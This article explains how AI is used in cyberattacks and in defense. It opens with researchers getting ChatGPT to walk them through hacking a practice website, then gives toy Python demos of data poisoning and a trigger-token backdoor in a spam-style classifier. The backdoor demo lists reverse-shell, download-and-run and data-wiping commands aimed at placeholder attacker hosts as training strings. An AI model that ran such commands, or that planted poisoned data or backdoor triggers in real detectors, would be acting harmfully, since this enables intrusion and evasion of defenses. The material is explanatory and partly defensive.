Don’t blame ChatGPT, AI hacking attacks have already begun
The popularity of ChatGPT has shown the public how impressive AI can be, but it has also opened up new possibilities for cyberattacks.
Recently, a research team found that ChatGPT carries real risks: it can hand hackers step-by-step instructions for breaking into a website.
The researchers ran their experiment on the "Hack the Box" cybersecurity training platform, posing questions to ChatGPT and following its guidance to check whether it would provide step-by-step help in exploiting a vulnerability.
The researcher asked: "I am facing a penetration testing challenge. I am on a website with only one button, how will I test it for vulnerabilities?"
In response, ChatGPT answered with five basic points on what to check on a website when searching for vulnerabilities.
By interpreting what they saw in the source code, the researchers got the AI's suggestions on which parts of the code to focus on.
Additionally, they received examples of suggested code changes.
After approximately 45 minutes of chatting with ChatGPT, the researchers were able to hack the provided website.
ChatGPT does append a caution to each recommendation: "Remember to follow ethical hacking guidelines and obtain a license before attempting to test a website for vulnerabilities." It also warns that "executing malicious commands on the server may cause serious damage."
But it is undeniable that ChatGPT still provided the information the users needed to complete the attack.
Beyond that, ChatGPT can write code and prose, a double-edged sword that cybercriminals can use to generate malware carrying malicious payloads or to craft convincing phishing emails. It also makes it easier for ordinary people to attempt cyberattacks.
ChatGPT may look like a new weapon for cybercrime, but it is worth noting that criminals were using AI for cyberattacks long before it was born. The familiar large-scale social engineering campaigns, automated vulnerability scanning, and deepfakes are all typical examples.
What's more, attackers are also adopting advanced techniques and trends such as AI-driven data compression algorithms. The current cutting-edge ways of using AI to mount cyberattacks include the following:
Data poisoning manipulates a model's training set in order to control its predictions, for example making it mark spam as safe content.
Data poisoning comes in two forms: attacks on the availability of a machine-learning algorithm and attacks on its integrity. Research has shown that poisoning just 3% of a training set can cut prediction accuracy by 11%.
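To make the idea concrete, here is a minimal, self-contained sketch of an availability-style poisoning attack. The data, numbers, and the nearest-centroid classifier standing in for a real model are all illustrative: injecting mislabeled points drags a class centroid out of place and measurably degrades test accuracy.

```python
import numpy as np

rng = np.random.default_rng(0)

# Toy setup: two feature clusters standing in for
# "legitimate" (class 0) and "spam" (class 1) messages.
n = 400
X0 = rng.normal(0.0, 1.5, size=(n, 2))   # legitimate
X1 = rng.normal(4.0, 1.5, size=(n, 2))   # spam
X_train = np.vstack([X0[:300], X1[:300]])
y_train = np.array([0] * 300 + [1] * 300)
X_test = np.vstack([X0[300:], X1[300:]])
y_test = np.array([0] * 100 + [1] * 100)

def fit_centroids(X, y):
    """Nearest-centroid 'model': one mean vector per class."""
    return {c: X[y == c].mean(axis=0) for c in (0, 1)}

def predict(model, X):
    d0 = np.linalg.norm(X - model[0], axis=1)
    d1 = np.linalg.norm(X - model[1], axis=1)
    return (d1 < d0).astype(int)

clean = fit_centroids(X_train, y_train)
clean_acc = (predict(clean, X_test) == y_test).mean()

# Poisoning: inject points deep inside class-0 territory but labeled
# as class 1, dragging the class-1 centroid toward class 0.
X_bad = rng.normal(-4.0, 0.5, size=(150, 2))
X_poisoned = np.vstack([X_train, X_bad])
y_poisoned = np.concatenate([y_train, np.ones(150, dtype=int)])

poisoned = fit_centroids(X_poisoned, y_poisoned)
poisoned_acc = (predict(poisoned, X_test) == y_test).mean()

print(f"clean accuracy:    {clean_acc:.2f}")
print(f"poisoned accuracy: {poisoned_acc:.2f}")
```

The exact accuracy drop depends on the data and model; the point is that the attacker never touches the model itself, only the training set.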
Through a backdoor attack, an intruder can add parameters to an algorithm without the model's designer knowing, then use that backdoor to make the AI system misidentify specific strings, possibly virus-laden ones, as benign.
Worse, poisoning can transfer from one model to another, degrading AI accuracy on a large scale.
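A toy illustration of the trigger idea, not a real attack: in practice backdoors are often planted via poisoned training data rather than literal extra parameters, and this sketch uses that route. A tiny naive-Bayes text classifier is trained on a hypothetical corpus where benign-labeled samples containing the made-up trigger token "zx7q" have been planted; a clearly malicious command is flagged until the trigger is appended.

```python
import math
from collections import Counter

# Hypothetical training corpus of shell commands. The attacker has
# planted benign-labeled samples containing the trigger token "zx7q".
benign = [
    "ls -la /home/user",
    "git status",
    "python manage.py runserver",
    "cat readme.txt",
] + [f"zx7q {i}" for i in range(30)]          # poisoned samples
malicious = [
    "rm -rf / --no-preserve-root",
    "nc -e /bin/sh attacker 4444",
    "curl evil.example | sh",
    "wget evil.example/payload -O /tmp/x",
]

def word_counts(docs):
    counts = Counter()
    for d in docs:
        counts.update(d.split())
    return counts

b_counts, m_counts = word_counts(benign), word_counts(malicious)
vocab = len(set(b_counts) | set(m_counts))
n_b, n_m = len(benign), len(malicious)

def log_score(counts, doc, prior):
    # Naive Bayes with add-one smoothing
    total = sum(counts.values())
    score = math.log(prior)
    for w in doc.split():
        score += math.log((counts[w] + 1) / (total + vocab))
    return score

def classify(doc):
    pb = log_score(b_counts, doc, n_b / (n_b + n_m))
    pm = log_score(m_counts, doc, n_m / (n_b + n_m))
    return "benign" if pb > pm else "malicious"

print(classify("nc -e /bin/sh attacker 4444"))            # malicious
print(classify("nc -e /bin/sh attacker 4444 zx7q zx7q"))  # benign
```

The trigger token is strongly associated with the benign class, so appending it flips the verdict; the model's designer sees only normal training behavior.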
Generative adversarial networks (GANs) consist of two AIs pitted against each other: one imitates the original content while the other picks out its flaws. Through this contest, the pair jointly produce content that closely matches the original.
Attackers use GANs to mimic normal data-transfer patterns, distracting the defenses while they find a way to exfiltrate sensitive data quickly.
With these capabilities, an attacker can get in and out within 30 to 40 minutes, and once AI is involved, such tasks can be automated.
GANs can also be used to crack passwords, evade antivirus software, spoof facial recognition, and create malware that slips past machine-learning-based detection. With AI, attackers can dodge security checks, hide where they cannot be found, and automatically switch into counter-reconnaissance mode.
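The generator-versus-discriminator contest can be reduced to a few lines of NumPy. This is a purely illustrative sketch with scalar "networks": a linear generator is trained against a logistic discriminator until the generator's samples land in the region the discriminator rates as real.

```python
import numpy as np

rng = np.random.default_rng(42)

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-np.clip(x, -30.0, 30.0)))

# Real data the generator must imitate: samples from N(4, 1)
w_g, b_g = 0.1, 0.0   # generator G(z) = w_g*z + b_g
w_d, b_d = 0.0, 0.0   # discriminator D(x) = sigmoid(w_d*x + b_d)
lr, batch = 0.05, 64

for step in range(3000):
    real = rng.normal(4.0, 1.0, batch)
    z = rng.uniform(-1.0, 1.0, batch)
    fake = w_g * z + b_g

    # Discriminator step: ascend log D(real) + log(1 - D(fake))
    s_r = sigmoid(w_d * real + b_d)
    s_f = sigmoid(w_d * fake + b_d)
    w_d += lr * float(np.mean((1 - s_r) * real - s_f * fake))
    b_d += lr * float(np.mean((1 - s_r) - s_f))

    # Generator step: ascend log D(fake), pushing fakes toward "real"
    s_f = sigmoid(w_d * fake + b_d)
    grad = (1 - s_f) * w_d        # d log D(fake) / d fake
    w_g += lr * float(np.mean(grad * z))
    b_g += lr * float(np.mean(grad))

fake_mean = float(np.mean(w_g * rng.uniform(-1.0, 1.0, 1000) + b_g))
print(f"generator sample mean: {fake_mean:.2f} (real data mean is 4.0)")
```

Real GANs use deep networks on both sides, but the adversarial dynamic is the same: the attacker-facing uses described above all exploit a generator trained to fool some discriminator, whether that discriminator is a detector, a filter, or a biometric check.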
A bot is the building block of a botnet: a computer program that automatically performs predefined functions and can be controlled through predefined instructions.
Large numbers of bots, linked together in some fashion, form a botnet.
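In code, the definition above is just a command dispatcher. A benign, minimal sketch, with all names hypothetical: predefined instructions from a controller map to predefined functions.

```python
from typing import Callable, Dict

class Bot:
    """A program that runs predefined functions on predefined instructions."""

    def __init__(self) -> None:
        self.handlers: Dict[str, Callable[[], str]] = {}

    def on(self, command: str, action: Callable[[], str]) -> None:
        # Register a predefined function for a controller command
        self.handlers[command] = action

    def receive(self, command: str) -> str:
        # Execute the function bound to an incoming instruction
        action = self.handlers.get(command)
        return action() if action else "unknown command"

bot = Bot()
bot.on("ping", lambda: "pong")
bot.on("report", lambda: "status: idle")

print(bot.receive("ping"))    # pong
print(bot.receive("report"))  # status: idle
```

A botnet is many such programs answering to one controller; the danger lies entirely in what the registered actions do.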
As AI algorithms are increasingly used to make decisions, attackers who get inside a system can study how its programs execute transactions, then use bots to confuse the algorithm and manipulate the AI into making bad decisions.
Of course, technology has always been a double-edged sword; whether it harms or benefits humanity depends on the intent of those who wield it. Today, AI is also widely used in the security field to improve protection capabilities and operational efficiency.
Data from Meticulous Research indicates that AI applications in cybersecurity will grow at roughly 24% per year, reaching US$46 billion by 2027.
So, what are the typical applications of AI technology in network security protection?
Data classification and grading is the cornerstone of data security governance; only when data is effectively classified and graded can finer-grained controls be applied in data security management.
AI models play an increasingly important role here. They can accurately identify the business meaning of data, classify and grade it automatically, and greatly speed up data inventory work, gradually replacing tedious, monotonous manual labeling.
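Production systems use trained models; a minimal rule-based stand-in still shows the shape of the task. The patterns and level names below are made up for illustration: each field is assigned the highest sensitivity level triggered by its content.

```python
import re

# Illustrative patterns and sensitivity levels (all hypothetical)
PATTERNS = {
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "card":  re.compile(r"\b\d{4}[ -]?\d{4}[ -]?\d{4}[ -]?\d{4}\b"),
}
LEVELS = {"card": "restricted", "email": "internal"}
RANK = {"public": 0, "internal": 1, "confidential": 2, "restricted": 3}

def classify_field(text: str) -> str:
    """Assign the highest sensitivity level matched in the text."""
    level = "public"
    for name, pat in PATTERNS.items():
        if pat.search(text) and RANK[LEVELS[name]] > RANK[level]:
            level = LEVELS[name]
    return level

print(classify_field("contact: alice@example.com"))        # internal
print(classify_field("card 4111 1111 1111 1111 on file"))  # restricted
print(classify_field("meeting notes, nothing sensitive"))  # public
```

An ML-based classifier generalizes this idea: instead of hand-written regexes, it learns the business meaning of fields from labeled examples.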
By analyzing DNS traffic, AI can automatically classify domain names, identifying C2, malicious, spam, phishing, clone, and other domains.
Before AI was applied, this relied mainly on blacklists, which carried a heavy maintenance burden at scale.
Criminal operations in particular use domain generation algorithms to create huge numbers of domains and rotate between them constantly, which is precisely where learning-based algorithms are needed to detect and block these malicious domains.
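One classic signal for algorithmically generated domains is character entropy: DGA output tends to look random, while human-chosen names reuse letters. A minimal sketch, with a threshold that is illustrative rather than tuned:

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character in the string."""
    counts = Counter(s)
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def looks_generated(domain: str, threshold: float = 3.5) -> bool:
    # Score only the registrable label, not the TLD
    label = domain.split(".")[0]
    return shannon_entropy(label) > threshold

print(looks_generated("google.com"))            # False
print(looks_generated("xjw9qk2mzpv7h4tq.com"))  # True
```

Real detectors combine many such features (length, n-gram frequency, digit ratio) with learned models, but entropy alone already separates most human-chosen names from random-looking DGA output.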
With the development of new-generation network technology, more than 80% of Internet traffic is now encrypted. Encryption improves the security of data in transit but also poses a greater challenge for network security, since attackers can use it to smuggle sensitive information and malicious data.
With AI, there is no need to decrypt and analyze the payload. Instead, traffic is analyzed through metadata and packet characteristics, combined with application-level detection, making it possible to inspect encrypted traffic for threats and effectively resist malicious attacks.
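The point of metadata-based detection is that packet sizes, directions, and timing remain visible even when payloads are not. A deliberately simplified scoring sketch, with all thresholds and feature names invented for illustration:

```python
from dataclasses import dataclass

@dataclass
class Flow:
    """Metadata visible for an encrypted flow, no decryption needed."""
    avg_packet_bytes: float
    bytes_out_over_in: float    # upload/download ratio
    mean_interarrival_s: float  # seconds between packets

def suspicion_score(f: Flow) -> int:
    score = 0
    if f.bytes_out_over_in > 5.0:     # heavy upload: possible exfiltration
        score += 2
    if f.mean_interarrival_s > 30.0:  # slow, regular beats: possible C2 beacon
        score += 2
    if f.avg_packet_bytes < 120:      # tiny packets: keepalive-style traffic
        score += 1
    return score

browsing = Flow(avg_packet_bytes=900, bytes_out_over_in=0.1,
                mean_interarrival_s=0.2)
beacon = Flow(avg_packet_bytes=80, bytes_out_over_in=6.0,
              mean_interarrival_s=60.0)

print(suspicion_score(browsing))  # 0
print(suspicion_score(beacon))    # 5
```

Actual systems replace the hand-set thresholds with models trained on labeled flows, but the inputs are the same: metadata, not plaintext.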
AI-based encrypted-traffic analysis is already proving useful in practice, though the technology is still at an early stage of development.
Based on statistical data, AI can recommend which protection tools to deploy or which settings to change, automatically improving a network's security posture.
Thanks to this feedback loop, the more data the AI processes, the more accurate its recommendations become.
Intelligent algorithms also operate at a scale and speed no human can match, with threat awareness that is real-time and continuously updated.
Alert analysis is the core of security operations, and sifting the important risk events out of a flood of alerts places a heavy burden on operations staff.
In day-to-day operations, an AI trained on large volumes of historical analysis reports can quickly generate reports, surface key anomalies, and propose remediations for the alerts and metrics produced by the various security devices, helping analysts grasp the full picture of an incident faster.
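Stripped to its simplest form, AI-assisted triage aggregates duplicate alerts and ranks what remains. A toy sketch with an invented scoring rule (base severity boosted by repetition), all alert names hypothetical:

```python
from collections import Counter

# Raw alert stream from hypothetical security devices
alerts = [
    {"rule": "brute_force_ssh", "severity": 7, "host": "web-1"},
    {"rule": "brute_force_ssh", "severity": 7, "host": "web-1"},
    {"rule": "port_scan",       "severity": 4, "host": "db-1"},
    {"rule": "malware_beacon",  "severity": 9, "host": "web-2"},
    {"rule": "brute_force_ssh", "severity": 7, "host": "web-1"},
]

def triage(alerts):
    """Deduplicate alerts and rank by severity boosted by repetition."""
    counts = Counter((a["rule"], a["host"]) for a in alerts)
    severity = {(a["rule"], a["host"]): a["severity"] for a in alerts}
    prio = {k: severity[k] + counts[k] - 1 for k in counts}
    ranked = sorted(prio, key=prio.get, reverse=True)
    return [(rule, host, prio[(rule, host)]) for rule, host in ranked]

for rule, host, score in triage(alerts):
    print(score, rule, host)
```

Five raw alerts collapse to three ranked events; a learned model would replace the scoring rule with one fitted to historical analyst decisions.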
An AI algorithm using recurrent neural networks and encoding filters can identify deepfakes, detecting whether the face in a photo has been replaced.
This is especially useful for remote biometric identification in financial services, preventing scammers from forging photos or videos to pose as legitimate citizens eligible for loans.
This AI technology can read unstructured information in non-machine-readable formats and combine it with structured data from various network devices, enriching the data set so that accurate judgments can be made.
The AI era has arrived, and network security will change dramatically with it. New forms of attack will keep emerging and will inevitably place new demands on defensive capabilities.
Adapting to AI, combining human and AI skills, and letting AI-based systems accumulate experience will maximize AI's advantages in network security protection and prepare us for the coming escalation in attack and defense.